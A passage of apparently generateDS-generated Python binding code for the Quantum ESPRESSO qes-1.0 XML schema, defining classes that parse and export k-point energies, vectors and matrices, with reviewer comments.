                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'lsda')
            self.lsda = ival_
        elif nodeName_ == 'noncolin':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'noncolin')
            self.noncolin = ival_
        elif nodeName_ == 'spinorbit':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'spinorbit')
            self.spinorbit = ival_
        elif nodeName_ == 'nbnd' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'nbnd')
            self.nbnd = ival_
        elif nodeName_ == 'nbnd_up' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ < 0:
                raise_parse_error(child_, 'requires nonNegativeInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'nbnd_up')
            self.nbnd_up = ival_
        elif nodeName_ == 'nbnd_dw' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ < 0:
                raise_parse_error(child_, 'requires nonNegativeInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'nbnd_dw')
            self.nbnd_dw = ival_
        elif nodeName_ == 'nelec' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'nelec')
            self.nelec = fval_
        elif nodeName_ == 'num_of_atomic_wfc' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            ival_ = self.gds_validate_integer(ival_, node, 'num_of_atomic_wfc')
            self.num_of_atomic_wfc = ival_
        elif nodeName_ == 'wf_collected':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'wf_collected')
            self.wf_collected = ival_
        elif nodeName_ == 'fermi_energy' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'fermi_energy')
            self.fermi_energy = fval_
        elif nodeName_ == 'highestOccupiedLevel' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'highestOccupiedLevel')
            self.highestOccupiedLevel = fval_
        elif nodeName_ == 'two_fermi_energies':
            two_fermi_energies_ = child_.text
            two_fermi_energies_ = self.gds_validate_double_list(two_fermi_energies_, node, 'two_fermi_energies')
            self.two_fermi_energies = two_fermi_energies_
            # validate type d2vectorType
            self.validate_d2vectorType(self.two_fermi_energies)
        elif nodeName_ == 'starting_k_points':
            obj_ = k_points_IBZType.factory()
            obj_.build(child_)
            self.starting_k_points = obj_
            obj_.original_tagname_ = 'starting_k_points'
        elif nodeName_ == 'nks' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'nks')
            self.nks = ival_
        elif nodeName_ == 'occupations_kind':
            obj_ = occupationsType.factory()
            obj_.build(child_)
            self.occupations_kind = obj_
            obj_.original_tagname_ = 'occupations_kind'
        elif nodeName_ == 'smearing':
            obj_ = smearingType.factory()
            obj_.build(child_)
            self.smearing = obj_
            obj_.original_tagname_ = 'smearing'
        elif nodeName_ == 'ks_energies':
            obj_ = ks_energiesType.factory()
            obj_.build(child_)
            self.ks_energies.append(obj_)
            obj_.original_tagname_ = 'ks_energies'
# end class band_structureType
class ks_energiesType(GeneratedsSuper):
    """Binding for a ``<ks_energies>`` element: one k-point together with
    its plane-wave count (``npw``), eigenvalues and occupations.

    NOTE(review): this class appears to be generateDS-generated code for
    the qes-1.0 schema; prefer regenerating from the schema over editing
    by hand.
    """
    subclass = None
    superclass = None
    def __init__(self, k_point=None, npw=None, eigenvalues=None, occupations=None):
        self.original_tagname_ = None
        # k_point is built as a k_pointType; npw must parse as a positive
        # integer; eigenvalues/occupations are vectorType (or a registered
        # subclass) -- see buildChildren below.
        self.k_point = k_point
        self.npw = npw
        self.eigenvalues = eigenvalues
        self.occupations = occupations
    def factory(*args_, **kwargs_):
        # Constructor indirection: a subclass registered in
        # CurrentSubclassModule_ or via the class-level `subclass` hook
        # takes precedence over this class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, ks_energiesType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if ks_energiesType.subclass:
            return ks_energiesType.subclass(*args_, **kwargs_)
        else:
            return ks_energiesType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_k_point(self): return self.k_point
    def set_k_point(self, k_point): self.k_point = k_point
    def get_npw(self): return self.npw
    def set_npw(self, npw): self.npw = npw
    def get_eigenvalues(self): return self.eigenvalues
    def set_eigenvalues(self, eigenvalues): self.eigenvalues = eigenvalues
    def get_occupations(self): return self.occupations
    def set_occupations(self, occupations): self.occupations = occupations
    def hasContent_(self):
        # True when any child is set; controls <tag>...</tag> vs <tag/> in
        # export().
        if (
            self.k_point is not None or
            self.npw is not None or
            self.eigenvalues is not None or
            self.occupations is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='ks_energiesType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (and its children) as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('ks_energiesType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Re-emit under the tag name this object was parsed from, if any.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ks_energiesType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='ks_energiesType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='ks_energiesType'):
        # This element has no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='ks_energiesType', fromsubclass_=False, pretty_print=True):
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.k_point is not None:
            self.k_point.export(outfile, level, namespaceprefix_, name_='k_point', pretty_print=pretty_print)
        if self.npw is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:npw>%s</qes:npw>%s' % (self.gds_format_integer(self.npw, input_name='npw'), eol_))
        if self.eigenvalues is not None:
            self.eigenvalues.export(outfile, level, namespaceprefix_, name_='eigenvalues', pretty_print=pretty_print)
        if self.occupations is not None:
            self.occupations.export(outfile, level, namespaceprefix_, name_='occupations', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'k_point':
            obj_ = k_pointType.factory()
            obj_.build(child_)
            self.k_point = obj_
            obj_.original_tagname_ = 'k_point'
        elif nodeName_ == 'npw' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            # Schema type is positiveInteger: reject zero and negatives.
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'npw')
            self.npw = ival_
        elif nodeName_ == 'eigenvalues':
            # Honor an xsi:type override on the child element, defaulting
            # to vectorType.
            class_obj_ = self.get_class_obj_(child_, vectorType)
            obj_ = class_obj_.factory()
            obj_.build(child_)
            self.eigenvalues = obj_
            obj_.original_tagname_ = 'eigenvalues'
        elif nodeName_ == 'occupations':
            class_obj_ = self.get_class_obj_(child_, vectorType)
            obj_ = class_obj_.factory()
            obj_.build(child_)
            self.occupations = obj_
            obj_.original_tagname_ = 'occupations'
# end class ks_energiesType
class closedType(GeneratedsSuper):
    """Binding for a ``<closed>`` element: text content plus ``DATE`` and
    ``TIME`` string attributes.

    NOTE(review): appears to be generateDS-generated qes-1.0 binding code;
    prefer regenerating from the schema over hand edits.
    """
    subclass = None
    superclass = None
    def __init__(self, DATE=None, TIME=None, valueOf_=None):
        self.original_tagname_ = None
        # DATE/TIME are kept as raw attribute strings (no cast applied).
        self.DATE = _cast(None, DATE)
        self.TIME = _cast(None, TIME)
        # valueOf_ holds the element's text content.
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Constructor indirection: registered/hooked subclasses win over
        # this class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, closedType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if closedType.subclass:
            return closedType.subclass(*args_, **kwargs_)
        else:
            return closedType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_DATE(self): return self.DATE
    def set_DATE(self, DATE): self.DATE = DATE
    def get_TIME(self): return self.TIME
    def set_TIME(self, TIME): self.TIME = TIME
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # Numeric 0/0.0 still counts as content (the `1 if ...` guard);
        # otherwise plain truthiness of the text value decides.
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_)
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='closedType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('closedType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='closedType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='closedType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='closedType'):
        if self.DATE is not None and 'DATE' not in already_processed:
            already_processed.add('DATE')
            outfile.write(' DATE=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.DATE), input_name='DATE')), ))
        if self.TIME is not None and 'TIME' not in already_processed:
            already_processed.add('TIME')
            outfile.write(' TIME=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.TIME), input_name='TIME')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='closedType', fromsubclass_=False, pretty_print=True):
        # Simple-content element: no child elements to export.
        pass
    def build(self, node):
        """Populate this object from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('DATE', node)
        if value is not None and 'DATE' not in already_processed:
            already_processed.add('DATE')
            self.DATE = value
        value = find_attr_value_('TIME', node)
        if value is not None and 'TIME' not in already_processed:
            already_processed.add('TIME')
            self.TIME = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class closedType
class vectorType(GeneratedsSuper):
    """Binding for a ``<vector>``-style element: text content (the vector
    data) with a ``size`` integer attribute and optional ``xsi:type``
    extension support.

    NOTE(review): appears to be generateDS-generated qes-1.0 binding code;
    prefer regenerating from the schema over hand edits.
    """
    subclass = None
    superclass = None
    def __init__(self, size=None, valueOf_=None, extensiontype_=None):
        self.original_tagname_ = None
        self.size = _cast(int, size)
        # valueOf_ holds the element's text content.
        self.valueOf_ = valueOf_
        # extensiontype_ carries an xsi:type value for schema extension.
        self.extensiontype_ = extensiontype_
    def factory(*args_, **kwargs_):
        # Constructor indirection: registered/hooked subclasses win over
        # this class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, vectorType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if vectorType.subclass:
            return vectorType.subclass(*args_, **kwargs_)
        else:
            return vectorType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_size(self): return self.size
    def set_size(self, size): self.size = size
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def get_extensiontype_(self): return self.extensiontype_
    def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
    def hasContent_(self):
        # Numeric 0/0.0 still counts as content (the `1 if ...` guard).
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_)
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='vectorType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('vectorType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='vectorType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='vectorType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='vectorType'):
        if self.size is not None and 'size' not in already_processed:
            already_processed.add('size')
            outfile.write(' size="%s"' % self.gds_format_integer(self.size, input_name='size'))
        # Re-emit the xsi namespace declaration and xsi:type when this
        # instance was parsed as a derived type.
        if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
            outfile.write(' xsi:type="%s"' % self.extensiontype_)
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='vectorType', fromsubclass_=False, pretty_print=True):
        pass
    def build(self, node):
        """Populate this object from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('size', node)
        if value is not None and 'size' not in already_processed:
            already_processed.add('size')
            try:
                self.size = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
        value = find_attr_value_('xsi:type', node)
        if value is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            self.extensiontype_ = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class vectorType
class integerVectorType(GeneratedsSuper):
    """Binding for an integer-vector element: text content with a ``size``
    integer attribute and optional ``xsi:type`` extension support.

    NOTE(review): appears to be generateDS-generated qes-1.0 binding code;
    prefer regenerating from the schema over hand edits.
    """
    subclass = None
    superclass = None
    def __init__(self, size=None, valueOf_=None, extensiontype_=None):
        self.original_tagname_ = None
        self.size = _cast(int, size)
        # valueOf_ holds the element's text content.
        self.valueOf_ = valueOf_
        # extensiontype_ carries an xsi:type value for schema extension.
        self.extensiontype_ = extensiontype_
    def factory(*args_, **kwargs_):
        # Constructor indirection: registered/hooked subclasses win over
        # this class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, integerVectorType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if integerVectorType.subclass:
            return integerVectorType.subclass(*args_, **kwargs_)
        else:
            return integerVectorType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_size(self): return self.size
    def set_size(self, size): self.size = size
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def get_extensiontype_(self): return self.extensiontype_
    def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
    def hasContent_(self):
        # Numeric 0/0.0 still counts as content (the `1 if ...` guard).
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_)
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='integerVectorType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('integerVectorType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='integerVectorType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='integerVectorType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='integerVectorType'):
        if self.size is not None and 'size' not in already_processed:
            already_processed.add('size')
            outfile.write(' size="%s"' % self.gds_format_integer(self.size, input_name='size'))
        # Re-emit the xsi namespace declaration and xsi:type when this
        # instance was parsed as a derived type.
        if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
            outfile.write(' xsi:type="%s"' % self.extensiontype_)
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='integerVectorType', fromsubclass_=False, pretty_print=True):
        pass
    def build(self, node):
        """Populate this object from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('size', node)
        if value is not None and 'size' not in already_processed:
            already_processed.add('size')
            try:
                self.size = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
        value = find_attr_value_('xsi:type', node)
        if value is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            self.extensiontype_ = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class integerVectorType
class matrixType(GeneratedsSuper):
    """Binding for a matrix element: text content with ``rank`` (positive
    integer), ``dims`` and ``order`` attributes, plus optional ``xsi:type``
    extension support.

    NOTE(review): appears to be generateDS-generated qes-1.0 binding code;
    prefer regenerating from the schema over hand edits.
    """
    subclass = None
    superclass = None
    def __init__(self, rank=None, dims=None, order=None, valueOf_=None, extensiontype_=None):
        self.original_tagname_ = None
        self.rank = _cast(int, rank)
        self.dims = _cast(int, dims)
        # order is kept as a raw attribute string (no cast applied).
        self.order = _cast(None, order)
        # valueOf_ holds the element's text content.
        self.valueOf_ = valueOf_
        self.extensiontype_ = extensiontype_
    def factory(*args_, **kwargs_):
        # Constructor indirection: registered/hooked subclasses win over
        # this class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, matrixType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if matrixType.subclass:
            return matrixType.subclass(*args_, **kwargs_)
        else:
            return matrixType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_rank(self): return self.rank
    def set_rank(self, rank): self.rank = rank
    def get_dims(self): return self.dims
    def set_dims(self, dims): self.dims = dims
    def get_order(self): return self.order
    def set_order(self, order): self.order = order
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def get_extensiontype_(self): return self.extensiontype_
    def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
    def hasContent_(self):
        # Numeric 0/0.0 still counts as content (the `1 if ...` guard).
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_)
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='matrixType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('matrixType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='matrixType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='matrixType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='matrixType'):
        if self.rank is not None and 'rank' not in already_processed:
            already_processed.add('rank')
            outfile.write(' rank="%s"' % self.gds_format_integer(self.rank, input_name='rank'))
        if self.dims is not None and 'dims' not in already_processed:
            already_processed.add('dims')
            outfile.write(' dims=%s' % (quote_attrib(self.dims), ))
        if self.order is not None and 'order' not in already_processed:
            already_processed.add('order')
            outfile.write(' order=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.order), input_name='order')), ))
        # Re-emit the xsi namespace declaration and xsi:type when this
        # instance was parsed as a derived type.
        if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
            outfile.write(' xsi:type="%s"' % self.extensiontype_)
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='matrixType', fromsubclass_=False, pretty_print=True):
        pass
    def build(self, node):
        """Populate this object from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('rank', node)
        if value is not None and 'rank' not in already_processed:
            already_processed.add('rank')
            try:
                self.rank = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            # Schema type is positiveInteger: reject zero and negatives.
            if self.rank <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        # NOTE(review): dims is stored as the raw attribute string here,
        # not parsed to integers -- presumably a list type in the schema;
        # confirm against the qes schema if consuming it numerically.
        value = find_attr_value_('dims', node)
        if value is not None and 'dims' not in already_processed:
            already_processed.add('dims')
            self.dims = value
        value = find_attr_value_('order', node)
        if value is not None and 'order' not in already_processed:
            already_processed.add('order')
            self.order = value
        value = find_attr_value_('xsi:type', node)
        if value is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            self.extensiontype_ = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class matrixType
class integerMatrixType(GeneratedsSuper):
    """Binding for an integer-matrix element: text content with ``rank``
    (positive integer), ``dims`` and ``order`` attributes.

    NOTE(review): appears to be generateDS-generated qes-1.0 binding code;
    prefer regenerating from the schema over hand edits.
    """
    subclass = None
    superclass = None
    def __init__(self, rank=None, dims=None, order=None, valueOf_=None):
        self.original_tagname_ = None
        self.rank = _cast(int, rank)
        self.dims = _cast(int, dims)
        # order is kept as a raw attribute string (no cast applied).
        self.order = _cast(None, order)
        # valueOf_ holds the element's text content.
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Constructor indirection: registered/hooked subclasses win over
        # this class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, integerMatrixType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if integerMatrixType.subclass:
            return integerMatrixType.subclass(*args_, **kwargs_)
        else:
            return integerMatrixType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_rank(self): return self.rank
    def set_rank(self, rank): self.rank = rank
    def get_dims(self): return self.dims
    def set_dims(self, dims): self.dims = dims
    def get_order(self): return self.order
    def set_order(self, order): self.order = order
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # Numeric 0/0.0 still counts as content (the `1 if ...` guard).
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_)
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='integerMatrixType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('integerMatrixType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='integerMatrixType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='integerMatrixType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='integerMatrixType'):
        if self.rank is not None and 'rank' not in already_processed:
            already_processed.add('rank')
            outfile.write(' rank="%s"' % self.gds_format_integer(self.rank, input_name='rank'))
        if self.dims is not None and 'dims' not in already_processed:
            already_processed.add('dims')
            outfile.write(' dims=%s' % (quote_attrib(self.dims), ))
        if self.order is not None and 'order' not in already_processed:
            already_processed.add('order')
            outfile.write(' order=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.order), input_name='order')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='integerMatrixType', fromsubclass_=False, pretty_print=True):
        pass
    def build(self, node):
        """Populate this object from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('rank', node)
        if value is not None and 'rank' not in already_processed:
            already_processed.add('rank')
            try:
                self.rank = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
